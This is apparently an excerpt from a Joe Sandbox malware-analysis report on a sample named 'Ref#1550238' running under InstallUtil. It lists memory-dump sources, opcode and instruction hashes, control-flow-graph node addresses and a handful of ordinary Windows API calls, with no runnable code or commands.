                                                                                    • Opcode ID: b4a79af1735c1071f236051c60b12898ce96853443ffcdaede2935edf9568a62
                                                                                    • Instruction ID: bd99a3d9fbcada2bcd21653d62fc2d82e033e7b411cdec9f8a91897cea1a8ab4
                                                                                    • Opcode Fuzzy Hash: b4a79af1735c1071f236051c60b12898ce96853443ffcdaede2935edf9568a62
                                                                                    • Instruction Fuzzy Hash: C0515A71D056598BEB68CF6B8D447CAFAF3AFC8340F04C1FA994CA6254EB704A858E41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d839f13a5bf7599b691615a9512cf4aaa48f136270a8dc0524a9a23009f740e
                                                                                    • Instruction ID: f55e0552e433ac1a0bd1ef8c14405238b08c53298339c56c6a02a1985dc061a9
                                                                                    • Opcode Fuzzy Hash: 0d839f13a5bf7599b691615a9512cf4aaa48f136270a8dc0524a9a23009f740e
                                                                                    • Instruction Fuzzy Hash: AE4148B5E016599BDB08CFABC94069EFBF3AFC8200F14C07AD958AB224EB3459458F54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 682884023df1f53f6d29c708d3631b90676d9eeecc3bf1011038d77841df7a5a
                                                                                    • Instruction ID: 441302d10ff392357928ff0f5b89ad5d8d9791959319b812d75d7cc60b557a58
                                                                                    • Opcode Fuzzy Hash: 682884023df1f53f6d29c708d3631b90676d9eeecc3bf1011038d77841df7a5a
                                                                                    • Instruction Fuzzy Hash: ED418BB1E056188BEB58CF6B8D4069AFAF3BFC9300F14C0BAD54CAB255DB3449868F15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528827060.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6c40000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a94a91c5f67195d1d9573bdedaa1e4490b913b7dc6d86bb7fd1a87ff35800420
                                                                                    • Instruction ID: 429c9bccb92d93a62063b99d8bf294161af3504deb3f96055a5979735e6b5279
                                                                                    • Opcode Fuzzy Hash: a94a91c5f67195d1d9573bdedaa1e4490b913b7dc6d86bb7fd1a87ff35800420
                                                                                    • Instruction Fuzzy Hash: 714111B1D056558BEB6CCF6B8D447CAF6F3AFC8300F14C5FA954CA6254EB700A858E41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 726c740f7c04c6a924f69444b3b19326ad4237be6174735640aa7c556823ff64
                                                                                    • Instruction ID: 6e8aafb844bc24700fa51f31eedcda618195f37e3d5c730b1b0c323cfc6f5113
                                                                                    • Opcode Fuzzy Hash: 726c740f7c04c6a924f69444b3b19326ad4237be6174735640aa7c556823ff64
                                                                                    • Instruction Fuzzy Hash: FD316B71D156298BEB59DF6BDD5069EFAFBAFC9300F04D1FAD418A6254DB300A818F40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65e7abc221c759d123a34dbd9e0363a1f8b9c0a0facd8b1b3020eb336b670e13
                                                                                    • Instruction ID: e911ff68edfc98f709b8104a5d39b6b0ae5b1306ac11b352daa096203ed7eb42
                                                                                    • Opcode Fuzzy Hash: 65e7abc221c759d123a34dbd9e0363a1f8b9c0a0facd8b1b3020eb336b670e13
                                                                                    • Instruction Fuzzy Hash: 5D3197B0D056288BEB68CF6BC94979AFAF3AF88304F14D1E9C44CA6254DB740A858F11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: decb4c00d3821ceb5d5e3856818b6c475bc4f786a76727bd3916798d1e2842fd
                                                                                    • Instruction ID: 5805b724c05da28bb7651dd7288fd1a6568e57117d38c6262e543babee748e8f
                                                                                    • Opcode Fuzzy Hash: decb4c00d3821ceb5d5e3856818b6c475bc4f786a76727bd3916798d1e2842fd
                                                                                    • Instruction Fuzzy Hash: F7310A71D097548FEB59CF6B88402DABBF3AFCA310F04C0AAD448AB265D6340A86CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 768a081759558aa0ed8db00d9c26e05fec4e2bbe60891d6874052ed7d95b38f5
                                                                                    • Instruction ID: af9992765e9ca2f17bb9d5f0e39786e4c77c9bfbd5d6cab14ec779e923061cfe
                                                                                    • Opcode Fuzzy Hash: 768a081759558aa0ed8db00d9c26e05fec4e2bbe60891d6874052ed7d95b38f5
                                                                                    • Instruction Fuzzy Hash: 5431E871D056688BEB58DF6BC8847DDBAF6AF89300F04C0AAE509AA255D7740985CF44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2529084026.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ea0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 414368759e5db8f699d905ab6e79cbf38fd9683e61d4d6bff24dfd7ca2967de5
                                                                                    • Instruction ID: 28c720ff84e0686e637852c6565b7734bd28facd6332c73231a744280f9f6c23
                                                                                    • Opcode Fuzzy Hash: 414368759e5db8f699d905ab6e79cbf38fd9683e61d4d6bff24dfd7ca2967de5
                                                                                    • Instruction Fuzzy Hash: 7B314D71D043558BEB68CF2BCC4479ABBF7EFC5200F04D0FA851CA6215EB740A868E50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 01ba00516c62ad05fc679cb77df2280e27721e5fb2dc229d99ad84b4481952b4
                                                                                    • Instruction ID: 7a0352a0ca6f8908f1c170fdd013197767afdfe041fc4db0982a741efaa17948
                                                                                    • Opcode Fuzzy Hash: 01ba00516c62ad05fc679cb77df2280e27721e5fb2dc229d99ad84b4481952b4
                                                                                    • Instruction Fuzzy Hash: 2531A2B1D146658BEB5DCF6BDD50699FAF7AFC9200F04D1FAD41CA6254DB340A828F40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 210810e7d88994b4ffa2ee300cdb46d263cee55f72c8e51b8cd9ba5b36437774
                                                                                    • Instruction ID: 887dd7afb461f22f0f97a3b1f1c1c8b15d8ea787e9cadf9f4e15da49a42ee875
                                                                                    • Opcode Fuzzy Hash: 210810e7d88994b4ffa2ee300cdb46d263cee55f72c8e51b8cd9ba5b36437774
                                                                                    • Instruction Fuzzy Hash: 132189B1D05A188BEB68CF5BCD4979AFAF3AFC9304F14C1E9C44CA6254EB740A858F01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a119a16e8c0da06d73a7889d8fe14687c0935092333e9b467fc778546de92c2d
                                                                                    • Instruction ID: 249f30fa99acaec6129f14c6e2d303a6ad7192dd1118a385145ba9d473938d7e
                                                                                    • Opcode Fuzzy Hash: a119a16e8c0da06d73a7889d8fe14687c0935092333e9b467fc778546de92c2d
                                                                                    • Instruction Fuzzy Hash: 2E21A2B1E056289BEB18DF9AD84479EFAF6AFC9300F04C0AAD518AB254DB740946CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b79261642609117754330329d6f5cbfd3ece6c590ad60ff1e9bb9239c1a921c2
                                                                                    • Instruction ID: f63b6a0474185933fc2b0e66975d80e3bd9a68df10fd477e46bdfba276428034
                                                                                    • Opcode Fuzzy Hash: b79261642609117754330329d6f5cbfd3ece6c590ad60ff1e9bb9239c1a921c2
                                                                                    • Instruction Fuzzy Hash: EF2169B1D056188BEB68CF5BC94979AFAF7AFC9304F14C1E9C44CA6254EB740A858F41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:181
                                                                                    Total number of Limit Nodes:19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 511 6ceb318-6ceb327 512 6ceb329-6ceb336 call 6cea2ac 511->512 513 6ceb353-6ceb357 511->513 518 6ceb34c 512->518 519 6ceb338 512->519 515 6ceb36b-6ceb3ac 513->515 516 6ceb359-6ceb363 513->516 522 6ceb3ae-6ceb3b6 515->522 523 6ceb3b9-6ceb3c7 515->523 516->515 518->513 567 6ceb33e call 6ceb5b0 519->567 568 6ceb33e call 6ceb5a1 519->568 522->523 524 6ceb3eb-6ceb3ed 523->524 525 6ceb3c9-6ceb3ce 523->525 527 6ceb3f0-6ceb3f7 524->527 528 6ceb3d9 525->528 529 6ceb3d0-6ceb3d7 call 6cea2b8 525->529 526 6ceb344-6ceb346 526->518 530 6ceb488-6ceb548 526->530 532 6ceb3f9-6ceb401 527->532 533 6ceb404-6ceb40b 527->533 534 6ceb3db-6ceb3e9 528->534 529->534 562 6ceb54a-6ceb54d 530->562 563 6ceb550-6ceb57b GetModuleHandleW 530->563 532->533 537 6ceb40d-6ceb415 533->537 538 6ceb418-6ceb421 call 6ce3934 533->538 534->527 537->538 542 6ceb42e-6ceb433 538->542 543 6ceb423-6ceb42b 538->543 545 6ceb435-6ceb43c 542->545 546 6ceb451-6ceb45e 542->546 543->542 545->546 547 6ceb43e-6ceb44e call 6ce8af8 call 6cea2c8 545->547 552 6ceb460-6ceb47e 546->552 553 6ceb481-6ceb487 546->553 547->546 552->553 562->563 564 6ceb57d-6ceb583 563->564 565 6ceb584-6ceb598 563->565 564->565 567->526 568->526
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 569 6ced490-6ced4a4 570 6ced4de-6ced556 569->570 571 6ced4a6-6ced4d0 call 6cea464 569->571 575 6ced558-6ced55e 570->575 576 6ced561-6ced568 570->576 574 6ced4d5-6ced4d6 571->574 575->576 577 6ced56a-6ced570 576->577 578 6ced573-6ced612 CreateWindowExW 576->578 577->578 580 6ced61b-6ced653 578->580 581 6ced614-6ced61a 578->581 585 6ced655-6ced658 580->585 586 6ced660 580->586 581->580 585->586 587 6ced661 586->587 587->587
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CED602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 688 329e998-329e9b3 690 329e9dd-329e9fc call 329e1f4 688->690 691 329e9b5-329e9dc 688->691 696 329e9fe-329ea01 690->696 697 329ea02-329ea61 690->697 704 329ea63-329ea66 697->704 705 329ea67-329eaf4 GlobalMemoryStatusEx 697->705 709 329eafd-329eb25 705->709 710 329eaf6-329eafc 705->710 710->709
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737877182.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_3290000_InstallUtil.jbxd

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 713 6cea464-6ced556 715 6ced558-6ced55e 713->715 716 6ced561-6ced568 713->716 715->716 717 6ced56a-6ced570 716->717 718 6ced573-6ced612 CreateWindowExW 716->718 717->718 720 6ced61b-6ced653 718->720 721 6ced614-6ced61a 718->721 725 6ced655-6ced658 720->725 726 6ced660 720->726 721->720 725->726 727 6ced661 726->727 727->727
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CED602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0

                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06CEFCF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06CE3016,?,?,?,?,?), ref: 06CE30D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06CE3016,?,?,?,?,?), ref: 06CE30D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0

                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000006), ref: 0329EAE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737877182.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_3290000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06CEB334), ref: 06CEB56E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744282341.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6ce0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1679 6cfcfb8-6cfcfd3 1680 6cfcfd5-6cfcfd8 1679->1680 1681 6cfcfde-6cfcfe1 1680->1681 1682 6cfd4a4-6cfd4b0 1680->1682 1683 6cfcfe3-6cfcfe5 1681->1683 1684 6cfcff0-6cfcff3 1681->1684 1685 6cfd26e-6cfd27d 1682->1685 1686 6cfd4b6-6cfd7a3 1682->1686 1687 6cfcfeb 1683->1687 1688 6cfd4a1 1683->1688 1689 6cfcff5-6cfcff7 1684->1689 1690 6cfd002-6cfd005 1684->1690 1691 6cfd27f-6cfd284 1685->1691 1692 6cfd28c-6cfd298 1685->1692 1891 6cfd9ca-6cfd9d4 1686->1891 1892 6cfd7a9-6cfd7af 1686->1892 1687->1684 1688->1682 1694 6cfd35f-6cfd368 1689->1694 1695 6cfcffd 1689->1695 1696 6cfd04e-6cfd051 1690->1696 1697 6cfd007-6cfd049 1690->1697 1691->1692 1698 6cfd29e-6cfd2b0 1692->1698 1699 6cfd9d5-6cfda0e 1692->1699 1702 6cfd36a-6cfd36f 1694->1702 1703 6cfd377-6cfd383 1694->1703 1695->1690 1700 6cfd09a-6cfd09d 1696->1700 1701 6cfd053-6cfd095 1696->1701 1697->1696 1715 6cfd2b5-6cfd2b8 1698->1715 1716 6cfda10-6cfda13 1699->1716 1704 6cfd09f-6cfd0e1 1700->1704 1705 6cfd0e6-6cfd0e9 1700->1705 1701->1700 1702->1703 1708 6cfd389-6cfd39d 1703->1708 1709 6cfd494-6cfd499 1703->1709 1704->1705 1713 6cfd0eb-6cfd12d 1705->1713 1714 6cfd132-6cfd135 1705->1714 1708->1688 1729 6cfd3a3-6cfd3b5 1708->1729 1709->1688 1713->1714 1718 6cfd137-6cfd14d 1714->1718 1719 6cfd152-6cfd155 1714->1719 1724 6cfd2ba-6cfd2fc 1715->1724 1725 6cfd301-6cfd304 1715->1725 1726 6cfda46-6cfda49 1716->1726 1727 6cfda15-6cfda41 1716->1727 1718->1719 1735 6cfd15f-6cfd162 1719->1735 1736 6cfd157-6cfd15c 1719->1736 1724->1725 1733 6cfd34d-6cfd34f 1725->1733 1734 6cfd306-6cfd348 1725->1734 1730 6cfda4b call 6cfdb2d 1726->1730 1731 6cfda58-6cfda5b 1726->1731 1727->1726 1762 6cfd3d9-6cfd3db 1729->1762 1763 6cfd3b7-6cfd3bd 1729->1763 1754 6cfda51-6cfda53 1730->1754 1744 6cfda7e-6cfda80 1731->1744 1745 6cfda5d-6cfda79 1731->1745 1740 6cfd356-6cfd359 1733->1740 1741 6cfd351 1733->1741 1734->1733 1737 6cfd1ab-6cfd1ae 1735->1737 1738 
6cfd164-6cfd173 1735->1738 1736->1735 1750 6cfd1f7-6cfd1fa 1737->1750 1751 6cfd1b0-6cfd1f2 1737->1751 1748 6cfd175-6cfd17a 1738->1748 1749 6cfd182-6cfd18e 1738->1749 1740->1680 1740->1694 1741->1740 1756 6cfda87-6cfda8a 1744->1756 1757 6cfda82 1744->1757 1745->1744 1748->1749 1749->1699 1759 6cfd194-6cfd1a6 1749->1759 1765 6cfd1fc-6cfd23e 1750->1765 1766 6cfd243-6cfd246 1750->1766 1751->1750 1754->1731 1756->1716 1769 6cfda8c-6cfda9b 1756->1769 1757->1756 1759->1737 1774 6cfd3e5-6cfd3f1 1762->1774 1776 6cfd3bf 1763->1776 1777 6cfd3c1-6cfd3cd 1763->1777 1765->1766 1771 6cfd269-6cfd26c 1766->1771 1772 6cfd248-6cfd264 1766->1772 1789 6cfda9d-6cfdb00 call 6cf6618 1769->1789 1790 6cfdb02-6cfdb17 1769->1790 1771->1685 1771->1715 1772->1771 1804 6cfd3ff 1774->1804 1805 6cfd3f3-6cfd3fd 1774->1805 1783 6cfd3cf-6cfd3d7 1776->1783 1777->1783 1783->1774 1789->1790 1811 6cfd404-6cfd406 1804->1811 1805->1811 1811->1688 1816 6cfd40c-6cfd428 call 6cf6618 1811->1816 1829 6cfd42a-6cfd42f 1816->1829 1830 6cfd437-6cfd443 1816->1830 1829->1830 1830->1709 1832 6cfd445-6cfd492 1830->1832 1832->1688 1893 6cfd7be-6cfd7c7 1892->1893 1894 6cfd7b1-6cfd7b6 1892->1894 1893->1699 1895 6cfd7cd-6cfd7e0 1893->1895 1894->1893 1897 6cfd9ba-6cfd9c4 1895->1897 1898 6cfd7e6-6cfd7ec 1895->1898 1897->1891 1897->1892 1899 6cfd7ee-6cfd7f3 1898->1899 1900 6cfd7fb-6cfd804 1898->1900 1899->1900 1900->1699 1901 6cfd80a-6cfd82b 1900->1901 1904 6cfd82d-6cfd832 1901->1904 1905 6cfd83a-6cfd843 1901->1905 1904->1905 1905->1699 1906 6cfd849-6cfd866 1905->1906 1906->1897 1909 6cfd86c-6cfd872 1906->1909 1909->1699 1910 6cfd878-6cfd891 1909->1910 1912 6cfd9ad-6cfd9b4 1910->1912 1913 6cfd897-6cfd8be 1910->1913 1912->1897 1912->1909 1913->1699 1916 6cfd8c4-6cfd8ce 1913->1916 1916->1699 1917 6cfd8d4-6cfd8eb 1916->1917 1919 6cfd8ed-6cfd8f8 1917->1919 1920 6cfd8fa-6cfd915 1917->1920 1919->1920 1920->1912 1925 6cfd91b-6cfd934 call 6cf6618 1920->1925 1929 6cfd936-6cfd93b 1925->1929 1930 6cfd943-6cfd94c 1925->1930 1929->1930 
1930->1699 1931 6cfd952-6cfd9a6 1930->1931 1931->1912
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cca2ac3aa37a367ee0369830c7490db7e253e980ed15911704f5eb6ea006a8d6
                                                                                    • Instruction ID: e35371f9b2cb04b43d30c893ff07da831ea00050671ad273f882e784b109f4b2
                                                                                    • Opcode Fuzzy Hash: cca2ac3aa37a367ee0369830c7490db7e253e980ed15911704f5eb6ea006a8d6
                                                                                    • Instruction Fuzzy Hash: AC626C30B1031A8FDB55DF68E980A5DBBB2FF84740B208968D5069F358DB35ED86CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2cd961dc5a29db15705afd5397c13e2f6ffea8b1be542da3c8b512b4e7586ce
                                                                                    • Instruction ID: 4ecf75f2d7f9f042b5622c22363079d81149fa9a8402e1b327ae92e790d39427
                                                                                    • Opcode Fuzzy Hash: f2cd961dc5a29db15705afd5397c13e2f6ffea8b1be542da3c8b512b4e7586ce
                                                                                    • Instruction Fuzzy Hash: 10027B70E2020ACFDBA4DB68D4906ADB7B2FF89710F20892AD515DB351DB35DE81CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 83bc145e011d1787434120a6b8c338372e340c06f023e92a89abcaf69c42dafb
                                                                                    • Instruction ID: b93fc058c7e4acf1501004a6e5b1dc528f45a40e5af62a8be54f79b3070f439b
                                                                                    • Opcode Fuzzy Hash: 83bc145e011d1787434120a6b8c338372e340c06f023e92a89abcaf69c42dafb
                                                                                    • Instruction Fuzzy Hash: 03E17070E2030ACFDBA5DBA9D4406AEB7B6FF88300F208529D909EB354DB759D41CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cc1b64ce79c4e37bebe3be005310071916fffffa0905cea7b4570142894f8663
                                                                                    • Instruction ID: befffef1140dc5ee7a21c4bc2d8f254401b17a8ecb42a882945eb3d91ff703d9
                                                                                    • Opcode Fuzzy Hash: cc1b64ce79c4e37bebe3be005310071916fffffa0905cea7b4570142894f8663
                                                                                    • Instruction Fuzzy Hash: D9918E70B102058FDB98DFA8D8607AEBBF2AF89700F248429D505EB256EB349D46CB51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
